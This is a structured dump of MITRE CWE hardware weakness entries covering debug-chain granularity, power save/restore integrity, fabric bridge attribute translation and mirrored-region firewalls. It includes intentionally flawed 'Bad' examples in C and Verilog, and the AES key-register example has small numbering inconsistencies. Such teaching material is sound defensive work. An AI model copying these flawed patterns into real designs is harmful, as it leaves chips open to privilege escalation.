"ModificationOrganization": "MITRE",
"ModificationReleaseDate": "2024-02-29",
"ModificationVersion": "4.14",
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2024-02-29",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Missing Security Identifier",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "1294",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] | null | null |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "Consider a system with a register for storing AES key for encryption or decryption. The key is of 128 bits implemented as a set of four 32-bit registers. The key registers are assets, and the register AES_KEY_ACCESS_POLICY is defined to provide the necessary access controls.\n\n\nThe access-policy register defines which agents with a security identifier in the transaction can access the AES-key registers. Each bit in this 32-bit register defines a security identifier. There could be a maximum of 32 security identifiers that are allowed accesses to the AES-key registers. The number of the bit when set (i.e., \"1\") allows for a respective action from an agent whose identity matches the number of the bit; if set to \"0\" (i.e., Clear), it disallows the respective action to that corresponding agent.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "| Register | Field description | \n| --- | --- |\n| AES_ENC_DEC_KEY_0 | AES key [0:31] for encryption or decryption, Default 0x00000000 |\n| AES_ENC_DEC_KEY_1 | AES key [32:63] for encryption or decryption, Default 0x00000000 |\n| AES_ENC_DEC_KEY_2 | AES key [64:95] for encryption or decryption, Default 0x00000000 |\n| AES_ENC_DEC_KEY_4 | AES key [96:127] for encryption or decryption, Default 0x00000000 |\n| AES_KEY_ACCESS_POLICY | [31:0] Default 0x00000004 - agent with Security Identifier \"2\" has access to AES_ENC_DEC_KEY_0 through AES_ENC_DEC_KEY_4 registers |",
"IntroText": null,
"Language": null,
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "The originator sends a transaction with no security identifier, i.e., meaning the value is \"0\" or NULL. The AES-Key-access register does not allow the necessary action and drops the transaction because the originator failed to include the required security identifier.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "| Register | Field description | \n| --- | --- |\n| AES_ENC_DEC_KEY_0 | AES key [0:31] for encryption or decryption, Default 0x00000000 |\n| AES_ENC_DEC_KEY_1 | AES key [32:63] for encryption or decryption, Default 0x00000000 |\n| AES_ENC_DEC_KEY_2 | AES key [64:95] for encryption or decryption, Default 0x00000000 |\n| AES_ENC_DEC_KEY_4 | AES key [96:127] for encryption or decryption, Default 0x00000000 |\n| AES_KEY_ACCESS_POLICY | [31:0] Default 0x00000002 - agent with security identifier \"2\" has access to AES_ENC_DEC_KEY_0 through AES_ENC_DEC_KEY_4 registers |",
"IntroText": null,
"Language": null,
"Nature": "Good",
"Reference": null
},
{
"BodyText": "The originator should send a transaction with Security Identifier \"2\" which will allow access to the AES-Key-access register and allow encryption and decryption operations.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
}
],
"ID": null
}
] | null | null | null | null | 1
|
[
[
"284",
"1294",
"1302"
]
] |
[] |
1296
|
Incorrect Chaining or Granularity of Debug Components
|
Base
|
Simple
|
Incomplete
|
The product's debug components contain incorrect chaining or granularity of debug components.
|
For debugging and troubleshooting a chip, several hardware design elements are often implemented, including:
- Various Test Access Ports (TAPs) allow boundary scan commands to be executed.
- For scanning the internal components of a chip, there are scan cells that allow the chip to be used as a "stimulus and response" mechanism.
- Chipmakers might create custom methods to observe the internal components of their chips by placing various tracing hubs within their chip and creating hierarchical or interconnected structures among those hubs.
Logic errors during design or synthesis could misconfigure the interconnection of the debug components, which could allow unintended access permissions.
|
[
{
"Class": null,
"Name": "Verilog",
"Prevalence": "Undetermined",
"Type": "Language"
},
{
"Class": null,
"Name": "VHDL",
"Prevalence": "Undetermined",
"Type": "Language"
},
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
},
{
"Class": "Not OS-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Operating_System"
},
{
"Class": "Not Architecture-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Architecture"
},
{
"Class": null,
"Name": "Processor Hardware",
"Prevalence": "Undetermined",
"Type": "Technology"
},
{
"Class": "Not Technology-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Technology"
}
] | null |
[
{
"Note": null,
"Phase": "Implementation"
}
] |
[
{
"Impact": [
"Gain Privileges or Assume Identity",
"Bypass Protection Mechanism",
"Execute Unauthorized Code or Commands",
"Modify Memory",
"Modify Files or Directories"
],
"Likelihood": [
"Medium"
],
"Note": "Depending on the access to debug component(s) erroneously granted, an attacker could use the debug component to gain additional understanding about the system to further an attack and/or execute other commands. This could compromise any security property, including the ones listed above.",
"Scope": [
"Confidentiality",
"Integrity",
"Access Control",
"Authentication",
"Authorization",
"Availability",
"Accountability"
]
}
] |
[
{
"Description": "Ensure that debug components are properly chained and their granularity is maintained at different authentication levels.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Implementation"
],
"Strategy": null
}
] |
[
{
"Description": "Incorrect access control in RDP Level 1 on STMicroelectronics STM32F0 series devices allows physically present attackers to extract the device's protected firmware via a special sequence of Serial Wire Debug (SWD) commands because there is a race condition between full initialization of the SWD interface and the setup of flash protection.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2017-18347",
"Reference": "CVE-2017-18347"
},
{
"Description": "There is an improper authorization vulnerability in several smartphones. The system has a logic-judging error, and, under certain scenarios, a successful exploit could allow the attacker to switch to third desktop after a series of operations in ADB mode. (Vulnerability ID: HWPSIRT-2019-10114).",
"Link": "https://www.cve.org/CVERecord?id=CVE-2020-1791",
"Reference": "CVE-2020-1791"
}
] | null | null |
[
"121",
"702"
] | null |
[
{
"Note": "This entry is still under development and will continue to see updates and content improvements.",
"Type": "Maintenance"
}
] |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2020-05-31",
"SubmissionName": "Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna",
"SubmissionOrganization": "Intel Corporation",
"SubmissionReleaseDate": "2020-08-20",
"SubmissionVersion": "4.2",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns",
"ModificationDate": "2021-07-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms, Related_Attack_Patterns",
"ModificationDate": "2022-04-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms",
"ModificationDate": "2022-06-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns",
"ModificationDate": "2023-01-31",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "284",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] | null |
[
{
"Description": "Appropriate Post-Si tests should be carried out at various authorization levels to ensure that debug components are properly chained and accessible only to users with appropriate credentials.",
"DetectionMethodID": null,
"Effectiveness": "High",
"EffectivenessNotes": null,
"Method": "Architecture or Design Review"
},
{
"Description": "Appropriate Post-Si tests should be carried out at various authorization levels to ensure that debug components are properly chained and accessible only to users with appropriate credentials.",
"DetectionMethodID": null,
"Effectiveness": "High",
"EffectivenessNotes": null,
"Method": "Dynamic Analysis with Manual Results Interpretation"
}
] |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "The following example shows how an attacker can take advantage of incorrect chaining or missing granularity of debug components.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "In a System-on-Chip (SoC), the user might be able to access the SoC-level TAP with a certain level of authorization. However, this access should not also grant access to all of the internal TAPs (e.g., Core). Separately, if any of the internal TAPs is also stitched to the TAP chain when it should not be because of a logic error, then an attacker can access the internal TAPs as well and execute commands there.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "As a related example, suppose there is a hierarchy of TAPs (TAP_A is connected to TAP_B and TAP_C, then TAP_B is connected to TAP_D and TAP_E, then TAP_C is connected to TAP_F and TAP_G, etc.). Architecture mandates that the user have one set of credentials for just accessing TAP_A, another set of credentials for accessing TAP_B and TAP_C, etc. However, if, during implementation, the designer mistakenly implements a daisy-chained TAP where all the TAPs are connected in a single TAP chain without the hierarchical structure, the correct granularity of debug components is not implemented and the attacker can gain unauthorized access.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
}
],
"ID": null
}
] | null | null | null | null | 1
|
[
[
"284",
"1296"
]
] |
[] |
1304
|
Improperly Preserved Integrity of Hardware Configuration State During a Power Save/Restore Operation
|
Base
|
Simple
|
Draft
|
The product performs a power save/restore
operation, but it does not ensure that the integrity of
the configuration state is maintained and/or verified between
the beginning and ending of the operation.
|
Before powering down, the Intellectual Property (IP) saves current state (S) to persistent storage such as flash or always-on memory in order to optimize the restore operation. During this process, an attacker with access to the persistent storage may alter (S) to a configuration that could potentially modify privileges, disable protections, and/or cause damage to the hardware. If the IP does not validate the configuration state stored in persistent memory, upon regaining power or becoming operational again, the IP could be compromised through the activation of an unwanted/harmful configuration.
|
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
},
{
"Class": "Not OS-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Operating_System"
},
{
"Class": "Not Architecture-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Architecture"
},
{
"Class": "Not Technology-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Technology"
}
] | null |
[
{
"Note": "Weakness introduced via missing internal integrity guarantees during power save/restore",
"Phase": "Architecture and Design"
},
{
"Note": "Weakness introduced via missing external integrity verification during power save/restore",
"Phase": "Integration"
}
] |
[
{
"Impact": [
"DoS: Instability",
"DoS: Crash, Exit, or Restart",
"DoS: Resource Consumption (Other)",
"Gain Privileges or Assume Identity",
"Bypass Protection Mechanism",
"Alter Execution Logic",
"Quality Degradation",
"Unexpected State",
"Reduce Maintainability",
"Reduce Performance",
"Reduce Reliability"
],
"Likelihood": [
"High"
],
"Note": null,
"Scope": [
"Confidentiality",
"Integrity"
]
}
] |
[
{
"Description": "Inside the IP, incorporate integrity checking on the configuration state via a cryptographic hash. The hash can be protected inside the IP such as by storing it in internal registers which never lose power. Before powering down, the IP performs a hash of the configuration and saves it in these persistent registers. Upon restore, the IP performs a hash of the saved configuration and compares it with the saved hash. If they do not match, then the IP should not trust the configuration.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design"
],
"Strategy": null
},
{
"Description": "Outside the IP, incorporate integrity checking of the configuration state via a trusted agent. Before powering down, the trusted agent performs a hash of the configuration and saves the hash in persistent storage. Upon restore, the IP requests the trusted agent validate its current configuration. If the configuration hash is invalid, then the IP should not trust the configuration.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Integration"
],
"Strategy": null
},
{
"Description": "Outside the IP, incorporate a protected environment that prevents undetected modification of the configuration state by untrusted agents. Before powering down, a trusted agent saves the IP's configuration state in this protected location that only it is privileged to. Upon restore, the trusted agent loads the saved state into the IP.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Integration"
],
"Strategy": null
}
] | null | null | null |
[
"176"
] | null | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2020-07-16",
"SubmissionName": null,
"SubmissionOrganization": "Accellera Systems Initiative",
"SubmissionReleaseDate": "2020-08-20",
"SubmissionVersion": "4.2",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Functional_Areas",
"ModificationDate": "2021-03-15",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns",
"ModificationDate": "2021-07-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "284",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
},
{
"CweID": "345",
"Nature": "PeerOf",
"Ordinal": null,
"ViewID": "1000"
}
] | null | null |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "The following pseudo code demonstrates the power save/restore workflow which may lead to weakness through a lack of validation of the config state after restore.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "void save_config_state()\n {\n\n```\n\t void* cfg;\n\t cfg = get_config_state();\n\t save_config_state(cfg);\n\t go_to_sleep();\n }\n void restore_config_state()\n {\n\t void* cfg;\n\t cfg = get_config_file();\n\t load_config_file(cfg);\n }\n```",
"IntroText": null,
"Language": "C",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "The following pseudo-code is the proper workflow for the integrity checking mitigation:",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "void save_config_state()\n {\n\n```\n\t void* cfg;\n\t void* sha;\n\t cfg = get_config_state();\n\t save_config_state(cfg);\n\t // save hash(cfg) to trusted location\n\t sha = get_hash_of_config_state(cfg);\n\t save_hash(sha); \n\t go_to_sleep();\n }\n void restore_config_state()\n {\n\t void* cfg;\n\t void* sha_1, sha_2;\n\t cfg = get_config_file();\n\t // restore hash of config from trusted memory\n\t sha_1 = get_persisted_sha_value();\n\t sha_2 = get_hash_of_config_state(cfg);\n\t if (sha_1 != sha_2)\n\t\t assert_error_and_halt();\n\t load_config_file(cfg);\n }\n```",
"IntroText": null,
"Language": "C",
"Nature": "Good",
"Reference": null
},
{
"BodyText": "It must be noted that in the previous example of good pseudo code, the memory (where the hash of the config state is stored) must be trustworthy while the hardware is between the power save and restore states.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
}
],
"ID": null
}
] |
[
"Power"
] | null | null | null | 1
|
[
[
"284",
"1304"
]
] |
[] |
1311
|
Improper Translation of Security Attributes by Fabric Bridge
|
Base
|
Simple
|
Draft
|
The bridge incorrectly translates security attributes from either trusted to untrusted or from untrusted to trusted when converting from one fabric protocol to another.
|
A bridge allows IP blocks supporting different fabric protocols to be integrated into the system. Fabric end-points or interfaces usually have dedicated signals to transport security attributes. For example, HPROT signals in AHB, AxPROT signals in AXI, and MReqInfo and SRespInfo signals in OCP.
The values on these signals are used to indicate the security attributes of the transaction. These include the immutable hardware identity of the controller initiating the transaction, privilege level, and type of transaction (e.g., read/write, cacheable/non-cacheable, posted/non-posted).
A weakness can arise if the bridge IP block, which translates the signals from the protocol used in the IP block endpoint to the protocol used by the central bus, does not properly translate the security attributes. As a result, the identity of the initiator could be translated from untrusted to trusted or vice-versa. This could result in access-control bypass, privilege escalation, or denial of service.
|
[
{
"Class": null,
"Name": "Verilog",
"Prevalence": "Undetermined",
"Type": "Language"
},
{
"Class": null,
"Name": "VHDL",
"Prevalence": "Undetermined",
"Type": "Language"
},
{
"Class": "Not Technology-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Technology"
}
] | null |
[
{
"Note": null,
"Phase": "Architecture and Design"
},
{
"Note": null,
"Phase": "Implementation"
}
] |
[
{
"Impact": [
"Modify Memory",
"Read Memory",
"Gain Privileges or Assume Identity",
"Bypass Protection Mechanism",
"Execute Unauthorized Code or Commands"
],
"Likelihood": null,
"Note": null,
"Scope": [
"Confidentiality",
"Integrity",
"Access Control"
]
}
] |
[
{
"Description": "The translation must map signals in such a way that untrusted agents cannot map to trusted agents or vice-versa.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design"
],
"Strategy": null
},
{
"Description": "Ensure that the translation maps signals in such a way that untrusted agents cannot map to trusted agents or vice-versa.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Implementation"
],
"Strategy": null
}
] | null | null | null |
[
"1",
"180",
"233"
] | null | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2020-05-24",
"SubmissionName": "Arun Kanuparthi, Hareesh Khattri, Parbati Manna",
"SubmissionOrganization": "Intel Corporation",
"SubmissionReleaseDate": "2020-12-10",
"SubmissionVersion": "4.3",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples",
"ModificationDate": "2022-10-13",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": "Corrections in the demonstrative example.",
"ContributionDate": "2022-04-28",
"ContributionName": "Hareesh Khattri",
"ContributionOrganization": "Intel Corporation",
"ContributionReleaseDate": null,
"ContributionType": "Feedback",
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Contribution",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "284",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] | null | null |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "The bridge interfaces between OCP and AHB end points. OCP uses MReqInfo signal to indicate security attributes, whereas AHB uses HPROT signal to indicate the security attributes. The width of MReqInfo can be customized as needed. In this example, MReqInfo is 5-bits wide and carries the privilege level of the OCP controller.\n\n\nThe values 5'h11, 5'h10, 5'h0F, 5'h0D, 5'h0C, 5'h0B, 5'h09, 5'h08, 5'h04, and 5'h02 in MReqInfo indicate that the request is coming from a privileged state of the OCP bus controller. Values 5'h1F, 5'h0E, and 5'h00 indicate untrusted, privilege state.\n\n\nThough HPROT is a 5-bit signal, we only consider the lower, two bits in this example. HPROT values 2'b00 and 2'b10 are considered trusted, and 2'b01 and 2'b11 are considered untrusted.\n\n\nThe OCP2AHB bridge is expected to translate trusted identities on the controller side to trusted identities on the responder side. Similarly, it is expected to translate untrusted identities on the controller side to untrusted identities on the responder side.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "module ocp2ahb\n ( \n\n```\n\t ahb_hprot, \n\t ocp_mreqinfo \n ); \n output [1:0] ahb_hprot; // output is 2 bit signal for AHB HPROT\n input [4:0] ocp_mreqinfo; // input is 5 bit signal from OCP MReqInfo\n wire [6:0] p0_mreqinfo_o_temp; // OCP signal that transmits hardware identity of bus controller\n wire y;\n reg [1:0] ahb_hprot;\n // hardware identity of bus controller is in bits 5:1 of p0_mreqinfo_o_temp signal\n assign p0_mreqinfo_o_temp[6:0] = {1'b0, ocp_mreqinfo[4:0], y};\n always @*\n begin\n\t case (p0_mreqinfo_o_temp[4:2])\n\t\t 000: ahb_hprot = 2'b11; // OCP MReqInfo to AHB HPROT mapping\n\t\t 001: ahb_hprot = 2'b00;\n\t\t 010: ahb_hprot = 2'b00;\n\t\t 011: ahb_hprot = 2'b01;\n\t\t 100: ahb_hprot = 2'b00;\n\t\t 101: ahb_hprot = 2'b00;\n\t\t 110: ahb_hprot = 2'b10;\n\t\t 111: ahb_hprot = 2'b00;\n\t endcase\n end\n endmodule\n```",
"IntroText": null,
"Language": "Verilog",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "Logic in the case statement only checks for MReqInfo bits 4:2, i.e., hardware-identity bits 3:1. When ocp_mreqinfo is 5'h1F or 5'h0E, p0_mreqinfo_o_temp[2] will be 1. As a result, untrusted IDs from OCP 5'h1F and 5'h0E get translated to trusted ahb_hprot values 2'b00.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
}
],
"ID": null
}
] | null | null | null | null | 1
|
[
[
"284",
"1311"
]
] |
[] |
1312
|
Missing Protection for Mirrored Regions in On-Chip Fabric Firewall
|
Base
|
Simple
|
Draft
|
The firewall in an on-chip fabric protects the main addressed region, but it does not protect any mirrored memory or memory-mapped-IO (MMIO) regions.
|
Few fabrics mirror memory and address ranges, where mirrored regions contain copies of the original data. This redundancy is used to achieve fault tolerance. Whatever protections the fabric firewall implements for the original region should also apply to the mirrored regions. If not, an attacker could bypass existing read/write protections by reading from/writing to the mirrored regions to leak or corrupt the original data.
|
[
{
